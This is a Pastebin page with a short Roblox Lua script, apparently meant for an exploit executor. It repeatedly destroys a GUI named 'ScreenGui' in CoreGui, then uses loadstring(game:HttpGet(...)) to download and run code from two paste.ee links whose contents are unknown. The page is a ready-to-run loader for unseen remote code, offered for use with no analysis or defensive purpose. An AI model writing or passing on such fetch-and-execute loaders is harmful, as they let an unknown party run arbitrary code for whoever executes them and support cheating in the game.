Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- local CoreGui = game:GetService("CoreGui")
- local guiNameToBlock = "ScreenGui"
- local function deleteUnwantedGui()
- local gui = CoreGui:FindFirstChild(guiNameToBlock)
- if gui then
- print("Removing unwanted ScreenGui from CoreGui:", guiNameToBlock)
- gui:Destroy()
- end
- end
- deleteUnwantedGui()
- CoreGui.ChildAdded:Connect(function(child)
- if child.Name == guiNameToBlock then
- print("Detected unwanted ScreenGui, deleting it.")
- child:Destroy()
- end
- end)
- task.spawn(function()
- while true do
- deleteUnwantedGui()
- task.wait(0.5)
- end
- end)
- local success, result = pcall(function()
- loadstring(game:HttpGet("https://paste.ee/r/yZURtW7I"))() --- here
- end)
- if not success then
- warn("Failed to load external script:", result)
- end
- loadstring(game:HttpGet("https://paste.ee/r/u0LHEGer"))()
Add Comment
Please, Sign In to add comment